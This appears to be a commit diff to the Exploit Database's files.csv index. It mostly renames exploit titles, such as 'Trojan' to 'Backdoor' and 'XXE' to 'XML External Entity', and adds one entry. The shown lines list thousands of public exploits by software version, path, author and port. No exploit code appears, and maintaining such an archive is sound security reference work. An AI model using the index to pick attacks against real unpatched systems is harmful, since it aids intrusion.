DB: 2017-11-03

1 new exploits Microsoft Windows 95/98/NT 4.0 - Help File Trojan Microsoft Windows 95/98/NT 4.0 - Help File Backdoor OpenBSD 2.9/3.0 - Default Crontab Root Compromise OpenBSD 2.9/3.0 - Default Crontab Root Command Injection Sam Spade 1.14 - Crawl website Buffer Overflow Sam Spade 1.14 - Crawl Website Buffer Overflow Vir.IT eXplorer Anti-Virus - Privilege Escalation UnrealIRCd 3.2.8.1 - Remote Downloader/Execute Trojan UnrealIRCd 3.2.8.1 - Remote Downloader/Execute ProFTPd 1.3.3c - Compromised Source (Trojan) Remote Code Execution ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution Energizer DUO Trojan Code - Execution (Metasploit) Arugizer Trojan Horse (Energizer DUO) - Code Execution (Metasploit) Poison Ivy 2.3.2 - C&C Server Buffer Overflow (Metasploit) Poison Ivy 2.3.2 (C2 Server) - Buffer Overflow (Metasploit) DCForum 6.0 - Remote Admin Privilege Compromise DCForum 6.0 - Remote Admin Privilege Arbitrary Commands Sendmail 8.12.6 - Trojan Horse Sendmail 8.12.6 - Compromised Source Backdoor MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Length Account Compromise MySQL 3.23.x/4.0.x - 'COM_CHANGE_USER' Password Length Account Zemra Botnet (CnC Web Panel) - Remote Code Execution (Metasploit) Zemra Botnet (C2 Web Panel) - Remote Code Execution (Metasploit) HP Release Control - Authenticated XXE (Metasploit) HP Release Control - Authenticated XML External Entity (Metasploit) phpMyAdmin 3.3.x/3.4.x - Local File Inclusion via XXE Injection (Metasploit) phpMyAdmin 3.3.x/3.4.x - Local File Inclusion via XML External Entity Injection (Metasploit) CakePHP 2.x < 2.2.0-RC2 - XXE Injection CakePHP 2.x < 2.2.0-RC2 - XML External Entity Injection Bitbot C2 Panel - 'gate2.php' Multiple Vulnerabilities Bitbot (C2 Web Panel) - 'gate2.php' Multiple Vulnerabilities Cythosia 2.x Botnet - SQL Injection Cythosia 2.x Botnet (C2 Web Panel) - SQL Injection EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read (Metasploit) EMC Cloud Tiering Appliance 10.0 - Unauthenticated XML External Entity Arbitrary File Read (Metasploit) Plesk 10.4.4/11.0.9 - SSO XXE / Cross-Site Scripting Injection Plesk 10.4.4/11.0.9 - SSO XML External Entity / Cross-Site Scripting Injection Enalean Tuleap 7.2 - XXE File Disclosure Enalean Tuleap 7.2 - XML External Entity File Disclosure Apache JackRabbit - WebDAV XXE Exploit Apache JackRabbit - WebDAV XML External Entity Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity DCForum - auth_user_file.txt File Multiple Information Disclosure Vulnerabilities DCForum - 'auth_user_file.txt' File Multiple Information Disclosure Vulnerabilities Qlikview 11.20 SR11 - Blind XXE Injection Qlikview 11.20 SR11 - Blind XML External Entity Injection AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure (via XXE Injection) AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XML External Entity Injection SAP NetWeaver AS JAVA 7.1 < 7.5 - ctcprotocol Servlet XXE SAP NetWeaver AS JAVA 7.1 < 7.5 - 'ctcprotocol Servlet' XML External Entity CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval CyberPower Systems PowerPanel 3.1.2 - Unauthenticated XML External Entity Out-Of-Band Data Retrieval
2017-11-03 05:01:35 +00:00 · 2017-11-03 05:01:35 +00:00 · 8194245b20
commit 8194245b20
parent c66d2f584e
5 changed files with 339 additions and 62 deletions
--- a/files.csv
+++ b/files.csv
@ -7522,7 +7522,7 @@ id,file,description,date,author,platform,type,port
 19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (2)",1997-02-13,"Solar Designer",multiple,local,0
 19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon Exploit",1996-11-16,"Leshka Zakharoff",multiple,local,0
 19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 - cwdtools Exploit",1999-10-22,"Brock Tellier",linux,local,0
-19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 - Help File Trojan",1999-12-10,"Pauli Ojanpera",windows,local,0
+19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 - Help File Backdoor",1999-12-10,"Pauli Ojanpera",windows,local,0
 19674,platforms/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - Privileged Program Debugging",1999-12-10,"Brock Tellier",sco,local,0
 19676,platforms/freebsd/local/19676.c,"FreeBSD 3.3/Linux Mandrake 7.0 - 'xsoldier' Buffer Overflow (1)",2000-05-17,"Brock Tellier",freebsd,local,0
 19677,platforms/linux/local/19677.c,"FreeBSD 3.3/Linux Mandrake 7.0 - 'xsoldier' Buffer Overflow (2)",2000-05-17,"Larry W. Cashdollar",linux,local,0
@ -7936,7 +7936,7 @@ id,file,description,date,author,platform,type,port
 21359,platforms/multiple/local/21359.c,"Progress Database 9.1 - sqlcpp Local Buffer Overflow",2002-03-22,kf,multiple,local,0
 21360,platforms/solaris/local/21360.c,"Sun Solaris 2.6/7.0/8 - XSun Color Database File Heap Overflow",2002-04-02,gloomy,solaris,local,0
 21362,platforms/linux/local/21362.c,"Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",linux,local,0
-21373,platforms/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Compromise",2002-04-11,"Przemyslaw Frasunek",openbsd,local,0
+21373,platforms/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Command Injection",2002-04-11,"Przemyslaw Frasunek",openbsd,local,0
 21375,platforms/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilities",2002-04-11,"Paul Starzetz",linux,local,0
 21398,platforms/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,linux,local,0
 21407,platforms/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0
@ -8872,7 +8872,7 @@ id,file,description,date,author,platform,type,port
 38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0
 38559,platforms/linux/local/38559.txt,"Linux Kernel 3.3.5 - 'b43' Wireless Driver Privilege Escalation",2013-06-07,"Kees Cook",linux,local,0
 38576,platforms/aix/local/38576.sh,"AIX 7.1 - 'lquerylv' Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0
-38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - Crawl website Buffer Overflow",2015-11-02,MandawCoder,windows,local,0
+38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - Crawl Website Buffer Overflow",2015-11-02,MandawCoder,windows,local,0
 38601,platforms/windows/local/38601.py,"Sam Spade 1.14 - Scan Addresses Buffer Overflow",2015-11-02,VIKRAMADITYA,windows,local,0
 38603,platforms/windows/local/38603.py,"TCPing 2.1.0 - Buffer Overflow",2015-11-02,hyp3rlinx,windows,local,0
 38609,platforms/windows/local/38609.py,"Gold MP4 Player - '.swf' Local Exploit",2015-11-03,"Vivek Mahajan",windows,local,0
@ -9313,6 +9313,7 @@ id,file,description,date,author,platform,type,port
 43056,platforms/php/local/43056.py,"PHPMailer < 5.2.21 - Local File Disclosure",2017-10-25,"Maciek Krupa",php,local,0
 43057,platforms/windows/local/43057.txt,"HitmanPro 3.7.15 Build 281 - Kernel Pool Overflow",2017-10-26,cbayet,windows,local,0
 43104,platforms/windows/local/43104.py,"Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Buffer Overflow (SEH)",2017-10-05,"Venkat Rajgor",windows,local,0
 43109,platforms/windows/local/43109.c,"Vir.IT eXplorer Anti-Virus - Privilege Escalation",2017-11-01,"Parvez Anwar",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -10840,7 +10841,7 @@ id,file,description,date,author,platform,type,port
 13822,platforms/windows/remote/13822.txt,"Nginx 0.7.65/0.8.39 (dev) - Source Disclosure / Download",2010-06-11,"Jose A. Vazquez",windows,remote,0
 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote,0
 13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies - Web Server Remote Poison Null Byte Exploit",2010-06-13,kingcope,multiple,remote,80
-13853,platforms/linux/remote/13853.pl,"UnrealIRCd 3.2.8.1 - Remote Downloader/Execute Trojan",2010-06-13,anonymous,linux,remote,0
+13853,platforms/linux/remote/13853.pl,"UnrealIRCd 3.2.8.1 - Remote Downloader/Execute",2010-06-13,anonymous,linux,remote,0
 13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - Exploit (SEH)",2010-06-17,b0nd,windows,remote,0
 13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0
 14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0
@ -10964,7 +10965,7 @@ id,file,description,date,author,platform,type,port
 15648,platforms/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution",2010-12-01,bz1p,windows,remote,0
 15655,platforms/windows/remote/15655.html,"J-Integra 2.11 - ActiveX SetIdentity() Buffer Overflow",2010-12-01,Dr_IDE,windows,remote,0
 15658,platforms/windows/remote/15658.rb,"Viscom Image Viewer CP Gold 5.5 - 'Image2PDF()' Buffer Overflow (Metasploit)",2010-12-02,bz1p,windows,remote,0
-15662,platforms/linux/remote/15662.txt,"ProFTPd 1.3.3c - Compromised Source (Trojan) Remote Code Execution",2010-12-02,anonymous,linux,remote,21
+15662,platforms/linux/remote/15662.txt,"ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution",2010-12-02,anonymous,linux,remote,21
 15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0
 15668,platforms/windows/remote/15668.html,"Viscom Image Viewer CP Gold 6 - ActiveX 'TifMergeMultiFiles()' Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0
 15689,platforms/windows/remote/15689.py,"Freefloat FTP Server - Buffer Overflow",2010-12-05,0v3r,windows,remote,0
@ -11125,7 +11126,7 @@ id,file,description,date,author,platform,type,port
 16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16388,platforms/hardware/remote/16388.rb,"NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0
 16389,platforms/windows/remote/16389.rb,"Omni-NFS Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
-16390,platforms/windows/remote/16390.rb,"Energizer DUO Trojan Code - Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
+16390,platforms/windows/remote/16390.rb,"Arugizer Trojan Horse (Energizer DUO) - Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16391,platforms/windows/remote/16391.rb,"EMC AlphaStor Agent - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16392,platforms/windows/remote/16392.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)",2011-01-24,Metasploit,windows,remote,0
 16393,platforms/windows/remote/16393.rb,"Microsoft SQL Server - Resolution Overflow (MS02-039) (Metasploit)",2010-04-30,Metasploit,windows,remote,0
@ -12007,7 +12008,7 @@ id,file,description,date,author,platform,type,port
 19608,platforms/windows/remote/19608.c,"Microsoft Windows 95/98 - UNC Buffer Overflow (2)",1999-11-09,UNYUN,windows,remote,0
 19611,platforms/windows/remote/19611.txt,"TransSoft Broker FTP Server 3.0 x/4.0 - User Name Buffer Overflow",1999-11-08,"Ussr Labs",windows,remote,0
 19612,platforms/windows/remote/19612.pl,"Trend Micro Interscan VirusWall 3.2.3/3.3 - 'HELO' Buffer Overflow (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0
-19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 - C&C Server Buffer Overflow (Metasploit)",2012-07-06,Metasploit,windows,remote,3460
+19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 (C2 Server) - Buffer Overflow (Metasploit)",2012-07-06,Metasploit,windows,remote,3460
 19614,platforms/windows/remote/19614.asm,"Trend Micro Interscan VirusWall 3.2.3/3.3 - 'HELO' Buffer Overflow (2)",1999-11-07,"dark spyrit",windows,remote,0
 19617,platforms/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 - POP Buffer Overflow",1999-11-11,"Ussr Labs",windows,remote,0
 19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5 Media Player - ActiveX Error Message",1999-11-14,"Georgi Guninski",windows,remote,0
@ -12530,7 +12531,7 @@ id,file,description,date,author,platform,type,port
 20840,platforms/windows/remote/20840.txt,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (6)",2001-05-15,A.Ramos,windows,remote,0
 20841,platforms/windows/remote/20841.txt,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (7)",2001-05-15,"Gary O'Leary-Steele",windows,remote,0
 20842,platforms/windows/remote/20842.txt,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (8)",2001-05-15,Roelof,windows,remote,0
-20849,platforms/cgi/remote/20849.pl,"DCForum 6.0 - Remote Admin Privilege Compromise",2001-05-08,"Franklin DeMatto",cgi,remote,0
+20849,platforms/cgi/remote/20849.pl,"DCForum 6.0 - Remote Admin Privilege Arbitrary Commands",2001-05-08,"Franklin DeMatto",cgi,remote,0
 20850,platforms/windows/remote/20850.txt,"Pacific Software Carello 1.2.1 Shopping Cart - Command Execution",2001-05-14,"Peter GrÃ¼ndl",windows,remote,0
 20865,platforms/java/remote/20865.rb,"Java 7 Applet - Remote Code Execution (Metasploit)",2012-08-27,Metasploit,java,remote,0
 20869,platforms/multiple/remote/20869.html,"eSafe Gateway 2.1 - Script-filtering Bypass",2001-05-20,"eDvice Security Services",multiple,remote,0
@ -12924,7 +12925,7 @@ id,file,description,date,author,platform,type,port
 21902,platforms/windows/remote/21902.c,"Microsoft Windows XP/2000/NT 4.0 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0
 21910,platforms/windows/remote/21910.txt,"Microsoft IIS 5.0 - IDC Extension Cross-Site Scripting",2002-10-05,Roberto,windows,remote,0
 21913,platforms/windows/remote/21913.txt,"Citrix Published Applications - Information Disclosure",2002-10-07,wire,windows,remote,0
-21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 - Trojan Horse",2002-10-08,netmask,unix,remote,0
+21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 - Compromised Source Backdoor",2002-10-08,netmask,unix,remote,0
 21927,platforms/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,multiple,remote,0
 21932,platforms/windows/remote/21932.pl,"Microsoft Outlook Express 5.5/6.0 - S/MIME Buffer Overflow",2002-10-10,"Noam Rathaus",windows,remote,0
 21934,platforms/linux/remote/21934.txt,"KDE 3.0.x - KPF Icon Option File Disclosure",2002-10-11,"Ajay R Ramjatan",linux,remote,0
@ -12977,7 +12978,7 @@ id,file,description,date,author,platform,type,port
 22064,platforms/linux/remote/22064.pl,"Zeroo HTTP Server 1.5 - Directory Traversal (2)",2002-11-22,mattmurphy,linux,remote,0
 22078,platforms/windows/remote/22078.txt,"Mollensoft software Enceladus server suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0
 22082,platforms/windows/remote/22082.pl,"Trend Micro PC-cillin 2000/2002/2003 - Mail Scanner Buffer Overflow",2002-12-10,"Joel Soderberg",windows,remote,0
-22084,platforms/unix/remote/22084.c,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Length Account Compromise",2002-12-16,Andi,unix,remote,0
+22084,platforms/unix/remote/22084.c,"MySQL 3.23.x/4.0.x - 'COM_CHANGE_USER' Password Length Account",2002-12-16,Andi,unix,remote,0
 22085,platforms/unix/remote/22085.txt,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Memory Corruption",2002-12-12,"Stefan Esser",unix,remote,0
 22091,platforms/linux/remote/22091.c,"zkfingerd SysLog 0.9.1 - Format String",2002-12-16,"Marceta Milos",linux,remote,0
 22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote Root/SYSTEM SQL Injection",2012-10-19,xistence,multiple,remote,0
@ -15438,7 +15439,7 @@ id,file,description,date,author,platform,type,port
 38346,platforms/bsd/remote/38346.rb,"Watchguard XCS - Remote Command Execution (Metasploit)",2015-09-28,Metasploit,bsd,remote,443
 38352,platforms/windows/remote/38352.rb,"ManageEngine EventLog Analyzer - Remote Code Execution (Metasploit)",2015-09-29,Metasploit,windows,remote,8400
 38356,platforms/hardware/remote/38356.txt,"Foscam < 11.37.2.49 - Directory Traversal",2013-03-01,"Frederic Basse",hardware,remote,0
-38402,platforms/multiple/remote/38402.rb,"Zemra Botnet (CnC Web Panel) - Remote Code Execution (Metasploit)",2015-10-05,Metasploit,multiple,remote,0
+38402,platforms/multiple/remote/38402.rb,"Zemra Botnet (C2 Web Panel) - Remote Code Execution (Metasploit)",2015-10-05,Metasploit,multiple,remote,0
 38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - 'uploader.aspx' Arbitrary File Upload (Metasploit)",2015-10-05,Metasploit,windows,remote,0
 38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Cross-Site Scripting",2013-03-08,"Asheesh Anaconda",multiple,remote,0
 38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0
@ -22457,7 +22458,7 @@ id,file,description,date,author,platform,type,port
 9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 - 'store()' SQL Injection",2009-10-26,bookoo,php,webapps,0
 9965,platforms/php/webapps/9965.txt,"RunCMS 2ma - 'post.php' SQL Injection",2009-10-26,bookoo,php,webapps,0
 9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 - Team Services Source Code Disclosure",2009-10-26,"Daniel Martin",asp,webapps,0
-33434,platforms/windows/webapps/33434.rb,"HP Release Control - Authenticated XXE (Metasploit)",2014-05-19,"Brandon Perry",windows,webapps,80
+33434,platforms/windows/webapps/33434.rb,"HP Release Control - Authenticated XML External Entity (Metasploit)",2014-05-19,"Brandon Perry",windows,webapps,80
 9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Cross-Site Scripting / Cross-Site Request Forgery",2009-11-16,"Alexey Sintsov",hardware,webapps,80
 9978,platforms/php/webapps/9978.txt,"TwonkyMedia Server 4.4.17/5.0.65 - Cross-Site Scripting",2009-10-23,"Davide Canali",php,webapps,0
 9979,platforms/php/webapps/9979.txt,"Vivvo CMS 4.1.5.1 - file Disclosure",2009-10-22,"Janek Vind",php,webapps,0
@ -25968,7 +25969,7 @@ id,file,description,date,author,platform,type,port
 18357,platforms/php/webapps/18357.txt,"Pragyan CMS 2.6.1 - Arbitrary File Upload",2012-01-13,Dr.KroOoZ,php,webapps,0
 18373,platforms/jsp/webapps/18373.txt,"Cloupia End-to-end FlexPod Management - Directory Traversal",2012-01-15,"Chris Rock",jsp,webapps,0
 18374,platforms/php/webapps/18374.txt,"PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities",2012-01-16,Or4nG.M4N,php,webapps,0
-18371,platforms/php/webapps/18371.rb,"phpMyAdmin 3.3.x/3.4.x - Local File Inclusion via XXE Injection (Metasploit)",2012-01-14,"Marco Batista",php,webapps,0
+18371,platforms/php/webapps/18371.rb,"phpMyAdmin 3.3.x/3.4.x - Local File Inclusion via XML External Entity Injection (Metasploit)",2012-01-14,"Marco Batista",php,webapps,0
 18380,platforms/php/webapps/18380.txt,"Joomla! Component com_discussions - SQL Injection",2012-01-17,"Red Security TEAM",php,webapps,0
 18975,platforms/php/webapps/18975.rb,"Log1 CMS - 'writeInfo()' PHP Code Injection (Metasploit)",2012-06-03,Metasploit,php,webapps,0
 18383,platforms/php/webapps/18383.txt,"pGB 2.12 - 'kommentar.php' SQL Injection",2012-01-18,3spi0n,php,webapps,0
@ -26324,7 +26325,7 @@ id,file,description,date,author,platform,type,port
 19829,platforms/php/webapps/19829.txt,"Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0
 19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras - Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0
 19862,platforms/php/webapps/19862.pl,"WordPress Theme Diary/Notebook Site5 - Email Spoofing",2012-07-16,bwall,php,webapps,0
-19863,platforms/php/webapps/19863.txt,"CakePHP 2.x < 2.2.0-RC2 - XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0
+19863,platforms/php/webapps/19863.txt,"CakePHP 2.x < 2.2.0-RC2 - XML External Entity Injection",2012-07-16,"Pawel Wylecial",php,webapps,0
 19864,platforms/php/webapps/19864.txt,"VamCart CMS 0.9 - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0
 19865,platforms/php/webapps/19865.txt,"PBBoard CMS 2.1.4 - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0
 19898,platforms/php/webapps/19898.txt,"Forum Oxalis 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0
@ -30065,7 +30066,7 @@ id,file,description,date,author,platform,type,port
 27741,platforms/php/webapps/27741.txt,"Farsinews 2.5.3 - Cross-Site Scripting Multiple Vulnerabilities",2006-04-26,O.U.T.L.A.W.,php,webapps,0
 27742,platforms/php/webapps/27742.txt,"DevBB 1.0 - 'member.php' Cross-Site Scripting",2006-04-26,Qex,php,webapps,0
 27743,platforms/php/webapps/27743.txt,"MySmartBB 1.1.2/1.1.3 - Multiple Input Validation Vulnerabilities",2006-04-04,BoNy-m,php,webapps,0
-27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel - 'gate2.php' Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0
+27750,platforms/php/webapps/27750.py,"Bitbot (C2 Web Panel) - 'gate2.php' Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0
 27751,platforms/php/webapps/27751.txt,"WordPress Plugin ThinkIT 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",php,webapps,0
 27753,platforms/hardware/webapps/27753.txt,"Samsung DVR Firmware 1.10 - Authentication Bypass",2013-08-21,"Andrea Fabrizi",hardware,webapps,80
 27755,platforms/windows/webapps/27755.txt,"Adobe ColdFusion 9 - Administrative Authentication Bypass",2013-08-21,"Scott Buckel",windows,webapps,0
@ -31758,7 +31759,7 @@ id,file,description,date,author,platform,type,port
 30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Cross-Site Scripting Multiple Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
 30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injections",2007-06-25,"Jesper Jurcenoks",php,webapps,0
 30235,platforms/php/webapps/30235.txt,"KikChat - Local File Inclusion / Remote Code Execution",2013-12-12,cr4wl3r,php,webapps,0
-30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection",2013-12-12,GalaxyAndroid,php,webapps,0
+30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet (C2 Web Panel) - SQL Injection",2013-12-12,GalaxyAndroid,php,webapps,0
 30366,platforms/php/webapps/30366.txt,"Alstrasoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0
 30246,platforms/php/webapps/30246.txt,"WHMCompleteSolution (WHMCS) 4.x/5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0
 30248,platforms/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,hardware,webapps,0
@ -33269,7 +33270,7 @@ id,file,description,date,author,platform,type,port
 32619,platforms/ios/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,52789
 32620,platforms/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080
 32622,platforms/php/webapps/32622.txt,"WordPress Plugin Ajax Pagination 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80
-32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read (Metasploit)",2014-03-31,"Brandon Perry",multiple,webapps,0
+32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XML External Entity Arbitrary File Read (Metasploit)",2014-03-31,"Brandon Perry",multiple,webapps,0
 32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - 'adname' SQL Injection",2008-12-01,Pouya_Server,php,webapps,0
 32625,platforms/php/webapps/32625.txt,"PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0
 32626,platforms/asp/webapps/32626.txt,"ASP Forum Script - 'messages.asp?message_id' SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0
@ -33840,7 +33841,7 @@ id,file,description,date,author,platform,type,port
 33731,platforms/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 - Login SQL Injection",2010-03-10,"Yaniv Miron",multiple,webapps,0
 33732,platforms/php/webapps/33732.txt,"60cycleCMS - 'select.php' Multiple HTML Injection Vulnerabilities",2010-03-10,"pratul agrawal",php,webapps,0
 33734,platforms/php/webapps/33734.txt,"DDL CMS 2.1 - 'blacklist.php' Cross-Site Scripting",2010-03-10,ITSecTeam,php,webapps,0
-33736,platforms/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XXE / Cross-Site Scripting Injection",2014-06-13,"BLacK ZeRo",aix,webapps,0
+33736,platforms/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XML External Entity / Cross-Site Scripting Injection",2014-06-13,"BLacK ZeRo",aix,webapps,0
 33760,platforms/multiple/webapps/33760.txt,"(Multiple Products) - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,multiple,webapps,0
 33761,platforms/asp/webapps/33761.txt,"Pars CMS - 'RP' Multiple SQL Injections",2010-03-15,Isfahan,asp,webapps,0
 33740,platforms/hardware/webapps/33740.txt,"Yealink VoIP Phone SIP-T38G - Local File Inclusion",2014-06-13,Mr.Un1k0d3r,hardware,webapps,0
@ -34682,7 +34683,7 @@ id,file,description,date,author,platform,type,port
 35096,platforms/php/webapps/35096.txt,"Joomla! Component com_mailto - Cross-Site Scripting Multiple Vulnerabilities",2010-12-10,MustLive,php,webapps,0
 35097,platforms/php/webapps/35097.txt,"Joomla! Component com_redirect 1.5.19 - Local File Inclusion",2010-12-13,jos_ali_joe,php,webapps,0
 35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80
-35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80
+35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XML External Entity File Disclosure",2014-10-28,Portcullis,php,webapps,80
 35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80
 35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Unauthenticated Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80
 35214,platforms/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQL Injection",2014-11-11,"Anastasios Monachos",multiple,webapps,0
@ -35971,7 +35972,7 @@ id,file,description,date,author,platform,type,port
 37107,platforms/php/webapps/37107.txt,"WordPress Plugin NewStatPress 0.9.8 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80
